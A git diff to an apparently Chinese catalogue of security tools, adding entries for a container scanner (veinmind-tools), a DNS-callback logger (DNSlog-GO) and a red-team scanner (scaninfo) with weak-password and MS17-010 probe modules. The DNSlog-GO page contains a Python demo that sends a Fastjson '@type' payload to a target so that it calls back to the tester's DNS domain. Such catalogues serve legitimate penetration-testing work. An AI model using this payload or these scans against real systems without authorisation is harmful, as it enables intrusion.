diff --git a/README.md b/README.md index 2ab1e6b..d9d7bbb 100644 --- a/README.md +++ b/README.md @@ -17,6 +17,9 @@ | 时间 | 项目名称 | 项目动态 | |----|-----------|--------------------------| +|2022-03-16|[**veinmind-tools**](detail/veinmind-tools.md)|veinmind-tools加入星链计划| +|2022-03-16|[**DNSlog-GO**](detail/DNSlog-GO.md)|DNSlog-GO加入星链计划| +|2022-03-16|[**scaninfo**](detail/scaninfo.md)|scaninfo加入星链计划| |2022-03-11|[**Viper**](detail/Viper.md)|更新 [v1.5.18](detail/Viper.md#最近更新) 版本| |2022-03-11|[**f8x**](detail/f8x.md)|更新 [v1.6.0](detail/f8x.md#最近更新) 版本| |2022-03-10|[**CDK**](detail/CDK.md)|更新 [v1.0.6](detail/CDK.md#最近更新) 版本| @@ -24,9 +27,6 @@ |2022-03-05|[**pocsuite3**](detail/pocsuite3.md)|更新 [v1.9.0](detail/pocsuite3.md#最近更新) 版本| |2022-03-02|[**KunLun-M**](detail/KunLun-M.md)|更新 [v2.6.4.2](detail/KunLun-M.md#最近更新) 版本| |2022-02-25|[**GShark**](detail/gshark.md)|更新 [v0.9.1](detail/gshark.md#最近更新) 版本| -|2022-02-25|[**Kunyu**](detail/Kunyu.md)|更新 [v1.6.5](detail/Kunyu.md#最近更新) 版本| -|2022-01-13|[**ct**](detail/ct.md)|更新 [v1.0.5](detail/ct.md#最近更新) 版本| -|2022-01-11|[**HaE**](detail/HaE.md)|更新 [v2.1.3](detail/HaE.md#最近更新) 版本| **2.StarRank** @@ -62,6 +62,9 @@ | 时间 | 项目名称 | 项目简介 | |----|-----------|--------------------------| +|2022-03-16|[**veinmind-tools**](detail/veinmind-tools.md)|`veinmind-tools` 是基于 `veinmind-sdk` 打造的一个容器安全工具集,目前已支持镜像 恶意文件/后门/敏感信息/弱口令 的扫描,更多功能正在逐步开发中。| +|2022-03-16|[**DNSlog-GO**](detail/DNSlog-GO.md)|DNSLog-GO 是一款golang编写的监控 DNS 解析记录的工具,自带WEB界面。单文件运行,无依赖。部署方便快捷。| +|2022-03-16|[**scaninfo**](detail/scaninfo.md)|scaninfo 是一款开源、轻量、快速、跨平台的红队内外网打点扫描器。比较同类工具,其能够在 nmap 的扫描速度和 masscan 的准确度之间寻找一个较好的平衡点,能够快速进行端口扫描和服务识别,内置指纹识别用于 web 探测,可以用报告的方式整理扫描结果。| |2021-12-13|[**ct**](detail/ct.md)|ct 是一款使用 rust 语言进行开发,并且基于ZoomEye域名查询以及利用域名字典进行子域名爆破的工具,同时在最终爆破完成后可使用脚本,将相应的的.gv 文件转化成为相应的 .png 文件进行可视化展示| |2021-11-22|[**MySQL-Fake-Server**](detail/MySQL-Fake-Server.md)|用于渗透测试过程中的假MySQL服务器,纯原生python3实现,不依赖其它包。| |2021-11-22|[**BurpCrypto**](detail/BurpCrypto.md)|支持多种加密算法或直接执行JS代码的用于爆破前端加密的BurpSuite插件。| @@ -69,9 +72,6 @@ |2021-11-22|[**Kunyu**](detail/Kunyu.md)|Kunyu(坤舆),是一款基于ZoomEye API开发的信息收集工具,旨在让企业资产收集更高效,使更多安全相关从业者了解、使用网络空间测绘技术。| |2021-07-02|[**Pocassist**](detail/Pocassist.md)|Pocassist 是一个 Golang 编写的全新开源漏洞测试框架,帮助安全人员专注于漏洞验证的逻辑的实现。Pocassist 提供了简洁的 Web 图形化界面,用户可以在线编辑漏洞验证程序即可进行批量的测试;规则完全兼容 xray,可以直接使用现有开源的 PoC 库,同时也支持添加自定义规则。| |2021-07-02|[**MDUT**](detail/MDUT.md)|MDUT 全称 Multiple Database Utilization Tools,旨在将常见的数据库利用手段集合在一个程序中,打破各种数据库利用工具需要各种环境导致使用相当不便的隔阂;MDUT 使用 Java 开发,支持跨平台使用。| -|2021-07-02|[**OpenStar**](detail/OpenStar.md)|OpenStar 是一个基于 OpenResty 的高性能 Web 应用防火墙,支持复杂规则编写。提供了常规的 HTTP 字段规则配置,还提供了 IP 黑白名单、访问频次等配置,对于 CC 防护更提供的特定的规则算法,并且支持搭建集群进行防护。| -|2021-07-02|[**Stowaway**](detail/Stowaway.md)|Stowaway 是一款多级代理工具,可将外部流量通过多个节点代理至内网,突破内网访问限制。Stowaway 可以方便渗透测试人员通过多级跳跃,从外部dmz等一系列区域逐步深入核心网络;Stowaway 除了流量转发功能,还提供了端口复用、ssh隧道,流量伪装等专为渗透测试人员所用的功能。| -|2021-07-02|[**Platypus**](detail/Platypus.md)|Platypus 是一个基于终端与 Web UI 交互式的反弹 Shell 会话管理工具。在实际的渗透测试中,为了解决 Netcat/Socat 等工具在文件传输、多会话管理方面的不足。该工具在多会话管理的基础上增加了在渗透测试中更加有用的功能,可以更方便灵活地对反弹 Shell 会话进行管理。| **5.[分类:甲方工具](party_a.md)** @@ -81,6 +81,7 @@ |2|[**linglong**](detail/linglong.md)|awake1t|linglong是一款甲方资产巡航扫描系统。系统定位是发现资产,进行端口爆破。帮助企业更快发现弱口令问题。主要功能包括: 资产探测、端口爆破、定时任务、管理后台识别、报表展示。|977| |3|[**GShark**](detail/gshark.md)|madneal|一款开源敏感信息监测系统,可以监测包括 github、gitlab(目前不太稳定,由于gitlab对于免费用户不提供代码全文检索API)、searchcode 多平台的敏感信息监测。|455| |4|[**Juggler**](detail/Juggler.md)|C4o|一个也许能骗到黑客的系统,可以作为WAF等防护体系的一环。|390| +|5|[**veinmind-tools**](detail/veinmind-tools.md)|长亭科技|`veinmind-tools` 是基于 `veinmind-sdk` 打造的一个容器安全工具集,目前已支持镜像 恶意文件/后门/敏感信息/弱口令 的扫描,更多功能正在逐步开发中。|336| **6.[分类:信息收集](reconnaissance.md)** @@ -91,10 +92,11 @@ |3|[**Glass**](detail/Glass.md)|s7ckTeam|Glass是一款针对资产列表的快速指纹识别工具,通过调用Fofa/ZoomEye/Shodan/360等api接口快速查询资产信息并识别重点资产的指纹,也可针对IP/IP段或资产列表进行快速的指纹识别。|569| |4|[**Kunyu**](detail/Kunyu.md)|风起|Kunyu(坤舆),是一款基于ZoomEye API开发的信息收集工具,旨在让企业资产收集更高效,使更多安全相关从业者了解、使用网络空间测绘技术。|565| |5|[**ZoomEye-Python**](detail/ZoomEye-Python.md)|Knownsec404|ZoomEye-python 是一款基于 ZoomEye API 开发的 Python 库,提供了 ZoomEye 命令行模式,同时也可以作为 SDK 集成到其他工具中。该库可以让技术人员更便捷地搜索、筛选、导出 ZoomEye 的数据|331| -|6|[**ksubdomain**](detail/ksubdomain.md)|w8ay|ksubdomain是一款基于无状态子域名爆破工具,支持在Windows/Linux/Mac上使用,它会很快的进行DNS爆破,在Mac和Windows上理论最大发包速度在30w/s,linux上为160w/s的速度。|188| -|7|[**ct**](detail/ct.md)|rungobier@Knownsec404|ct 是一款使用 rust 语言进行开发,并且基于ZoomEye域名查询以及利用域名字典进行子域名爆破的工具,同时在最终爆破完成后可使用脚本,将相应的的.gv 文件转化成为相应的 .png 文件进行可视化展示|61| -|8|[**Zoomeye-Tools**](detail/ZoomEye-Tools.md)|Knownsec404|一个配合ZoomEye使用的Chrome插件,可以查看当前网页所在ip信息或跳转查看详细信息,还可以根据关键词一键跳转至ZoomEye进行搜索|31| -|9|[**ZoomEye-go**](detail/ZoomEye-go.md)|gyyyy|ZoomEye-go 是一款基于 ZoomEye API 开发的 Golang 库,提供了 ZoomEye 命令行模式,同时也可以作为SDK集成到其他工具中。该库可以让技术人员更便捷地搜索、筛选、导出 ZoomEye 的数据。|27| +|6|[**scaninfo**](detail/scaninfo.md)|华东360安服团队|scaninfo 是一款开源、轻量、快速、跨平台的红队内外网打点扫描器。比较同类工具,其能够在 nmap 的扫描速度和 masscan 的准确度之间寻找一个较好的平衡点,能够快速进行端口扫描和服务识别,内置指纹识别用于 web 探测,可以用报告的方式整理扫描结果。|286| +|7|[**ksubdomain**](detail/ksubdomain.md)|w8ay|ksubdomain是一款基于无状态子域名爆破工具,支持在Windows/Linux/Mac上使用,它会很快的进行DNS爆破,在Mac和Windows上理论最大发包速度在30w/s,linux上为160w/s的速度。|188| +|8|[**ct**](detail/ct.md)|rungobier@Knownsec404|ct 是一款使用 rust 语言进行开发,并且基于ZoomEye域名查询以及利用域名字典进行子域名爆破的工具,同时在最终爆破完成后可使用脚本,将相应的的.gv 文件转化成为相应的 .png 文件进行可视化展示|61| +|9|[**Zoomeye-Tools**](detail/ZoomEye-Tools.md)|Knownsec404|一个配合ZoomEye使用的Chrome插件,可以查看当前网页所在ip信息或跳转查看详细信息,还可以根据关键词一键跳转至ZoomEye进行搜索|31| +|10|[**ZoomEye-go**](detail/ZoomEye-go.md)|gyyyy|ZoomEye-go 是一款基于 ZoomEye API 开发的 Golang 库,提供了 ZoomEye 命令行模式,同时也可以作为SDK集成到其他工具中。该库可以让技术人员更便捷地搜索、筛选、导出 ZoomEye 的数据。|27| **7.全部分类** diff --git a/allprojects.md b/allprojects.md index 3258ecd..65e4f89 100644 --- a/allprojects.md +++ b/allprojects.md @@ -6,6 +6,7 @@ * [linglong](#linglong) * [gshark](#gshark) * [Juggler](#juggler) + * [veinmind-tools](#veinmind-tools) * [信息收集/reconnaissance](#信息收集reconnaissance) * [AppInfoScanner](#appinfoscanner) @@ -14,6 +15,7 @@ * [Glass](#glass) * [Kunyu](#kunyu) * [ZoomEye-Python](#zoomeye-python) + * [scaninfo](#scaninfo) * [ksubdomain](#ksubdomain) * [ct](#ct) * [ZoomEye-Tools](#zoomeye-tools) @@ -33,6 +35,7 @@ * [BurpCrypto](#burpcrypto) * [MySQL-Fake-Server](#mysql-fake-server) * [ysomap](#ysomap) + * [DNSlog-GO](#dnslog-go) * [Redis-Rogue-Server](#redis-rogue-server) * [MysqlT](#mysqlt) @@ -113,6 +116,16 @@ linglong是一款甲方资产巡航扫描系统。系统定位是发现资产, 一个也许能骗到黑客的系统,可以作为WAF等防护体系的一环。 +### [veinmind-tools](detail/veinmind-tools.md) +![Author](https://img.shields.io/badge/Author-长亭科技-orange) +![Language](https://img.shields.io/badge/Language-Golang/Python-blue) +![GitHub stars](https://img.shields.io/github/stars/chaitin/veinmind-tools.svg?style=flat&logo=github) +![Version](https://img.shields.io/badge/Version-V1.0.4-red) + + + +`veinmind-tools` 是基于 `veinmind-sdk` 打造的一个容器安全工具集,目前已支持镜像 恶意文件/后门/敏感信息/弱口令 的扫描,更多功能正在逐步开发中。 + ## 信息收集/reconnaissance @@ -176,6 +189,16 @@ Kunyu(坤舆),是一款基于ZoomEye API开发的信息收集工具,旨在 ZoomEye-python 是一款基于 ZoomEye API 开发的 Python 库,提供了 ZoomEye 命令行模式,同时也可以作为 SDK 集成到其他工具中。该库可以让技术人员更便捷地搜索、筛选、导出 ZoomEye 的数据 +### [scaninfo](detail/scaninfo.md) +![Author](https://img.shields.io/badge/Author-华东360安服团队-orange) +![Language](https://img.shields.io/badge/Language-Golang-blue) +![GitHub stars](https://img.shields.io/github/stars/redtoolskobe/scaninfo.svg?style=flat&logo=github) +![Version](https://img.shields.io/badge/Version-V1.1.0-red) + + + +scaninfo 是一款开源、轻量、快速、跨平台的红队内外网打点扫描器。比较同类工具,其能够在 nmap 的扫描速度和 masscan 的准确度之间寻找一个较好的平衡点,能够快速进行端口扫描和服务识别,内置指纹识别用于 web 探测,可以用报告的方式整理扫描结果。 + ### [ksubdomain](detail/ksubdomain.md) ![Author](https://img.shields.io/badge/Author-w8ay-orange) ![Language](https://img.shields.io/badge/Language-Golang-blue) @@ -332,6 +355,16 @@ MDUT 全称 Multiple Database Utilization Tools,旨在将常见的数据库利 Ysomap是一款适配于各类实际复杂环境的Java反序列化利用框架,可动态配置具备不同执行效果的Java反序列化利用链payload,以应对不同场景下的反序列化利用。 +### [DNSlog-GO](detail/DNSlog-GO.md) +![Author](https://img.shields.io/badge/Author-lanyi-orange) +![Language](https://img.shields.io/badge/Language-Golang-blue) +![GitHub stars](https://img.shields.io/github/stars/lanyi1998/DNSlog-GO.svg?style=flat&logo=github) +![Version](https://img.shields.io/badge/Version-V1.5.1-red) + + + +DNSLog-GO 是一款golang编写的监控 DNS 解析记录的工具,自带WEB界面。单文件运行,无依赖。部署方便快捷。 + ### [Redis-Rogue-Server](detail/Redis-Rogue-Server.md) ![Author](https://img.shields.io/badge/Author-Dliv3-orange) ![Language](https://img.shields.io/badge/Language-Python-blue) diff --git a/detail/DNSlog-GO.md b/detail/DNSlog-GO.md new file mode 100644 index 0000000..bfeb878 --- /dev/null +++ b/detail/DNSlog-GO.md @@ -0,0 +1,128 @@ +## DNSlog-GO + +![Language](https://img.shields.io/badge/Language-Golang-blue) +![Author](https://img.shields.io/badge/Author-lanyi-orange) +![GitHub stars](https://img.shields.io/github/stars/lanyi1998/DNSlog-GO.svg?style=flat&logo=github) +![Version](https://img.shields.io/badge/Version-V1.5.1-red) +![Time](https://img.shields.io/badge/Join-20220316-green) + + +DNSLog-GO 是一款golang编写的监控 DNS 解析记录的工具,自带多用户WEB界面 + +演示截图: + +![avatar](https://github.com/lanyi1998/DNSlog-GO/raw/master/images/demo.png) + +安装 +--- + +详细图文教程:https://mp.weixin.qq.com/s/m_UXJa0imfOi721bkBpwFg + +**个人单独使用推荐使用1.4版本 https://github.com/lanyi1998/DNSlog-GO/releases/tag/1.4** + +**团队使用推荐使用 最新版** + +## 1.获取发行版 + +这里 https://github.com/lanyi1998/DNSlog-GO/releases 下载最新发行版,并解压 + +## 2.域名与公网 IP 准备 + +``` +搭建并使用 DNSLog,你需要拥有两个域名,一个域名作为 NS 服务器域名(例:a.com),一个用于记录域名(例: b.com)。还需要有一个公网 IP 地址(如:1.1.1.1) + +注意:b.com 的域名提供商需要支持自定义 NS 记录, a.com 则无要求。 + +在 a.com 中设置两条 A 记录: + +ns1.a.com A 记录指向 1.1.1.1 +ns2.a.com A 记录指向 1.1.1.1 +修改 b.com 的 NS 记录为 1 中设定的两个域名 + +本步骤中,需要在域名提供商提供的页面进行设置,部分域名提供商只允许修改 NS 记录为已经认证过的 NS 地址。所以需要找一个支持修改 NS 记录为自己 NS 的域名提供商。 + +注意: NS 记录修改之后部分地区需要 24-48 小时会生效 +``` + +## 3.修改配置文件 config.ini + +``` +[HTTP] +Port = 8080 //http web监听端口 +Token = admin1,admin2 //多个用户token,用,分割。可以团队成员一起使用了 +ConsoleDisable = false //是否关闭web页面 + +[DNS] +Domain = demo.com //dnslog的域名 +``` + +## 4.启动对应系统的客户端,注意服务端重启以后,必须清空一下浏览器中的localStorage,否则会获取不到数据 + +--- + +API Python Demo + +```python +import requests +import random +import json + + +class DnsLog(): + domain = "" + token = "" + Webserver = "" + + def __init__(self, Webserver, token): + self.Webserver = Webserver # dnslog的http监听地址,格式为 ip:端口 + self.token = token # token + # 检测DNSLog服务器是否正常 + try: + res = requests.post("http://" + Webserver + "/api/verifyToken", json={"token": token}).json() + self.domain = res.Msg + except: + exit("DnsLog 服务器连接失败") + if res["Msg"] == "false": + exit("DnsLog token 验证失败") + + # 生成随机子域名 + def randomSubDomain(self, length=5): + subDomain = ''.join(random.sample('zyxwvutsrqponmlkjihgfedcba', length)) + '.' + self.domain + return subDomain + + # 验证子域名是否存在 + def checkDomain(self, domain): + res = requests.post("http://" + self.Webserver + "/api/verifyDns", json={"Query": domain}, + headers={"token": self.token}).json() + if res["Msg"] == "false": + return False + else: + return True + + +url = "http://192.168.41.2:8090/" + +dns = DnsLog("1111:8888", "admin") + +subDomain = dns.randomSubDomain() + +payload = { + "b": { + "@type": "java.net.Inet4Address", + "val": subDomain + } +} + +requests.post(url, json=payload) + +if dns.checkDomain(subDomain): + print("存在FastJosn") +``` + + +## 项目相关 + + +## 最近更新 + + diff --git a/detail/scaninfo.md b/detail/scaninfo.md new file mode 100644 index 0000000..c2e7e03 --- /dev/null +++ b/detail/scaninfo.md @@ -0,0 +1,115 @@ +## scaninfo + +![Language](https://img.shields.io/badge/Language-Golang-blue) +![Author](https://img.shields.io/badge/Author-华东360安服团队-orange) +![GitHub stars](https://img.shields.io/github/stars/redtoolskobe/scaninfo.svg?style=flat&logo=github) +![Version](https://img.shields.io/badge/Version-V1.1.0-red) +![Time](https://img.shields.io/badge/Join-20220316-green) + + +开源、轻量、快速、跨平台 的红队内外网打点扫描器 + +## 注意的点 + +- 漏洞扫描的时候有时候最后几个任务会卡住,是因为ftp爆破模块,这个fscan也一样目前没有好的解决办法,后续更新.先阶段可以-eq 21跳过ftp,或者control+c 主动停止不影响结果保存。 +- 有时候扫外网的全端口会漏掉端口可以使用-n 指定线程为500,400,默认为900.网络好的话900-1000都是没有问题 +- 关于结果报告 xlsx 文件是当你control+c 主动停止或任务正常结束时才会写入。txt文件是实时写入。 + + +## 项目说明 + +> 为何有这个项目 + +在渗透测试的端口扫描阶段,相信很多人遇到的问题是nmap太慢,masscan不准确。难以在速度与准确度之间寻找一个平衡。 其实有个工具不错就是[TXPortMap](https://github.com/4dogs-cn/TXPortMap)。但是没有进度条当大量扫描的时候结果处理也太友好。 + +在内网这块[fscan](https://github.com/shadow1ng/fscan)算是一款很优秀的工具但也有一些问题,如端口扫描不支持服务识别等。 + +指纹这块[EHole](https://github.com/EdgeSecurityTeam/EHole)也算一款很优秀的工具 + +## 如何解决这个问题 + +- scaninfo 专门解决上述问题并对上述项目代码进行了优化与重构,快速的端口扫描和服务识别比masscan更快。 + +- 包含fscan的绝大部份功能除了poc扫描和自定义字典 + +- 更好的web探测与指纹识别 + +- 更好的报告输出 + +## 使用说明 + +![image-20211105132301924](https://github.com/redtoolskobe/scaninfo/raw/main/infoscan.assets/image-20211105132301924.png) + +> 常见的参数 + +```shell +scaninfo -uf url.txt -m webfinger web指纹识别 +``` + +```shell +scaninfo -i 192.168.0.0/24 -p 1-65535 -eq 53 -m port 端口扫描 +``` + +```shell +scaninfo -i 192.168.0.0/24 -l ip.txt -uf url.txt -t1000 可以组合各种目标ip段ip文件url文件 +``` + +## 报告 + +> 报告主要是直观的excel并对每一种类型进行分类。同时也会生成txt json格式的结果。 + +![image-20211105134827966](https://github.com/redtoolskobe/scaninfo/raw/main/infoscan.assets/image-20211105134827966.png) + +![image-20211105134954709](https://github.com/redtoolskobe/scaninfo/raw/main/infoscan.assets/image-20211105134954709.png) + +## 参数 + +> 主要参数 + +| 参数 | 说明 | +| ----- | -------------------------------- | +| -ei | 排除某IP | +| -eq | 排除某端口 | +| -l | 指定IP文件 | +| -uf | 指定要web指纹识别的url文件 | +| -ff | 指定指纹文件默认使用内置 | +| -o | 指定保存的结果文件默认为result | +| -p | 指定端口默认使用top100 | +| -m | 指定扫描的模块默认为全部 | +| -pt | 指定ping 探测存活的线程 | +| -vt | 指定web指纹扫描的线程默认500 | +| -n | 指定端口扫描的线程默认900 | +| -show | 查看扫描支持的模块 | +| -t | 端口扫描tcp连接的超时时间默认0.5 | +| -np | 跳过存活探测 | + +> 模块说明 + +| 模块 | 说明 | +| --------- | ----------------------------------- | +| ftp | ftp弱口令探测 | +| ssh | ssh弱口令探测 | +| smb | smb弱口令探测 | +| mssql | mssql弱口令探测 | +| mysql | mysql弱口令探测 | +| mgo | mongodb弱口令探测 | +| redis | redis弱口令探测 | +| psql | psql弱口令探测 | +| ms17010 | ms17010探测 | +| smbghost | smbghost探测 | +| webfinger | web指纹识别 | +| netbios | netbios探测,可以识别主机名发现域控 | +| findnet | oxid | +| all | 所有 | +| port | 端口扫描 | +| ping | ping 存活 | +| mem | memcached弱口令 | + + + +## 项目相关 + + +## 最近更新 + + diff --git a/detail/veinmind-tools.md b/detail/veinmind-tools.md new file mode 100644 index 0000000..8353c3d --- /dev/null +++ b/detail/veinmind-tools.md @@ -0,0 +1,32 @@ +## veinmind-tools + +![Language](https://img.shields.io/badge/Language-Golang/Python-blue) +![Author](https://img.shields.io/badge/Author-长亭科技-orange) +![GitHub stars](https://img.shields.io/github/stars/chaitin/veinmind-tools.svg?style=flat&logo=github) +![Version](https://img.shields.io/badge/Version-V1.0.4-red) +![Time](https://img.shields.io/badge/Join-20220316-green) + + +veinmind-tools 是由长亭科技自研,基于veinmind-sdk打造的容器安全工具集 + +## 🔥 Demo +![](https://dinfinite.oss-cn-beijing.aliyuncs.com/image/20220307110440.gif) + +## 🔨 工具列表 + +| 工具 | 功能 | +|---|---| +| [veinmind-malicious](https://github.com/chaitin/veinmind-tools/tree/master/veinmind-malicious) | 扫描镜像中的恶意文件 | +| [veinmind-weakpass](https://github.com/chaitin/veinmind-tools/tree/master/veinmind-weakpass) | 扫描镜像中的弱口令 | +| [veinmind-sensitive](https://github.com/chaitin/veinmind-tools/tree/master/veinmind-sensitive) | 扫描镜像中的敏感信息 | +| [veinmind-backdoor](https://github.com/chaitin/veinmind-tools/tree/master/veinmind-backdoor) | 扫描镜像中的后门 | +| [veinmind-history](https://github.com/chaitin/veinmind-tools/tree/master/veinmind-history) | 扫描镜像中的异常历史命令 | + + + +## 项目相关 + + +## 最近更新 + + diff --git a/party_a.md b/party_a.md index 6a1ae52..da3a4a0 100644 --- a/party_a.md +++ b/party_a.md @@ -5,6 +5,7 @@ 3. [linglong](#linglong) 4. [GShark](#gshark) 5. [Juggler](#juggler) +6. [veinmind-tools](#veinmind-tools) ---------------------------------------- @@ -58,3 +59,13 @@ linglong是一款甲方资产巡航扫描系统。系统定位是发现资产, 一个也许能骗到黑客的系统,可以作为WAF等防护体系的一环。 +### [veinmind-tools](detail/veinmind-tools.md) +![Author](https://img.shields.io/badge/Author-长亭科技-orange) +![Language](https://img.shields.io/badge/Language-Golang/Python-blue) +![GitHub stars](https://img.shields.io/github/stars/chaitin/veinmind-tools.svg?style=flat&logo=github) +![Version](https://img.shields.io/badge/Version-V1.0.4-red) + + + +`veinmind-tools` 是基于 `veinmind-sdk` 打造的一个容器安全工具集,目前已支持镜像 恶意文件/后门/敏感信息/弱口令 的扫描,更多功能正在逐步开发中。 + diff --git a/penetration_test.md b/penetration_test.md index 7723859..649a8cd 100644 --- a/penetration_test.md +++ b/penetration_test.md @@ -7,8 +7,9 @@ 5. [BurpCrypto](#burpcrypto) 6. [MySQL-Fake-Server](#mysql-fake-server) 7. [ysomap](#ysomap) -8. [Redis-Rogue-Server](#redis-rogue-server) -9. [MysqlT](#mysqlt) +8. [DNSlog-GO](#dnslog-go) +9. [Redis-Rogue-Server](#redis-rogue-server) +10. [MysqlT](#mysqlt) ---------------------------------------- @@ -82,6 +83,16 @@ MDUT 全称 Multiple Database Utilization Tools,旨在将常见的数据库利 Ysomap是一款适配于各类实际复杂环境的Java反序列化利用框架,可动态配置具备不同执行效果的Java反序列化利用链payload,以应对不同场景下的反序列化利用。 +### [DNSlog-GO](detail/DNSlog-GO.md) +![Author](https://img.shields.io/badge/Author-lanyi-orange) +![Language](https://img.shields.io/badge/Language-Golang-blue) +![GitHub stars](https://img.shields.io/github/stars/lanyi1998/DNSlog-GO.svg?style=flat&logo=github) +![Version](https://img.shields.io/badge/Version-V1.5.1-red) + + + +DNSLog-GO 是一款golang编写的监控 DNS 解析记录的工具,自带WEB界面。单文件运行,无依赖。部署方便快捷。 + ### [Redis-Rogue-Server](detail/Redis-Rogue-Server.md) ![Author](https://img.shields.io/badge/Author-Dliv3-orange) ![Language](https://img.shields.io/badge/Language-Python-blue) diff --git a/reconnaissance.md b/reconnaissance.md index eced4bb..07c31ba 100644 --- a/reconnaissance.md +++ b/reconnaissance.md @@ -6,10 +6,11 @@ 4. [Glass](#glass) 5. [Kunyu](#kunyu) 6. [ZoomEye-Python](#zoomeye-python) -7. [ksubdomain](#ksubdomain) -8. [ct](#ct) -9. [Zoomeye-Tools](#zoomeye-tools) -10. [ZoomEye-go](#zoomeye-go) +7. [scaninfo](#scaninfo) +8. [ksubdomain](#ksubdomain) +9. [ct](#ct) +10. [Zoomeye-Tools](#zoomeye-tools) +11. [ZoomEye-go](#zoomeye-go) ---------------------------------------- @@ -73,6 +74,16 @@ Kunyu(坤舆),是一款基于ZoomEye API开发的信息收集工具,旨在 ZoomEye-python 是一款基于 ZoomEye API 开发的 Python 库,提供了 ZoomEye 命令行模式,同时也可以作为 SDK 集成到其他工具中。该库可以让技术人员更便捷地搜索、筛选、导出 ZoomEye 的数据 +### [scaninfo](detail/scaninfo.md) +![Author](https://img.shields.io/badge/Author-华东360安服团队-orange) +![Language](https://img.shields.io/badge/Language-Golang-blue) +![GitHub stars](https://img.shields.io/github/stars/redtoolskobe/scaninfo.svg?style=flat&logo=github) +![Version](https://img.shields.io/badge/Version-V1.1.0-red) + + + +scaninfo 是一款开源、轻量、快速、跨平台的红队内外网打点扫描器。比较同类工具,其能够在 nmap 的扫描速度和 masscan 的准确度之间寻找一个较好的平衡点,能够快速进行端口扫描和服务识别,内置指纹识别用于 web 探测,可以用报告的方式整理扫描结果。 + ### [ksubdomain](detail/ksubdomain.md) ![Author](https://img.shields.io/badge/Author-w8ay-orange) ![Language](https://img.shields.io/badge/Language-Golang-blue)